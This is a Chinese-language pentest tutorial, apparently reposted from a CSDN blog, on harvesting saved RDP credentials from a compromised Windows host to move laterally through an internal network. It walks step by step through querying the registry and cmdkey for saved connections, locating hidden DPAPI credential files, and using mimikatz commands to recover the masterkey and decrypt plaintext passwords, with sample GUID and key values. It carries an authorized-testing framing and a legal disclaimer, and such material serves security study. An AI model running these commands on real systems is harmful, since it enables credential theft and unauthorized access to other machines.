内网横向扩大战果,RDP远程桌面密码凭证获取

华盟原创文章投稿奖励计划

1

前言介绍

在授权渗透过程中,如果获取了一台windows的权限,可以尝试去获取该主机保存的远程桌面连接凭证,从而在内网横向中扩大成果。也就是当我们获取一台windows服务器,可以尝试获取本地远程连接的信息甚至可以拿到明文密码,横向移动。

2

技术细节

RDP保存凭据通过rdp服务登录远程桌面时,如果选择了记住凭证,会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码。

自动草稿

通过注册表查看当前主机本地连接过的目标机器记录

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

自动草稿

查看当前主机保存的RDP凭据

cmdkey /list

自动草稿

查看本地用户是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

自动草稿

这些文件默认是隐藏的,需要关闭隐藏

自动草稿

自动草稿

自动草稿

这里只看4.28号的文件:B0B07C74251019634D3D975E183A4D01
通过密码文件获取guidMasterKey的值选择密码文件,使用mimikatz对其文件进行解密,并记录下guidMasterKey的值需要对应修改路径和文件名:C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01" exit

自动草稿

guidMasterKey的值为:{667e9c69-1d5d-4f18-aad2-04437c5c03c5}需要记下这个guidMasterKey的值根据guidMasterKey找到对应Masterkey根据guidMasterKey,使用mimikatz找到对应的Masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > 1.txt

自动草稿

获得

MasterKey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba

解密获取明文通过MasterKey,使用mimikatz解密pbData数据,获取RDP连接明文密码

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01 /masterkey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba" exit

获取用户名密码

自动草稿

3

总结

通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey,通过Masterkey进行解密,获取明文。

文章作者:CSDN(keepb1ue)

文章来源:https://blog.csdn.net/qq_36618918/article/details/130677478

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容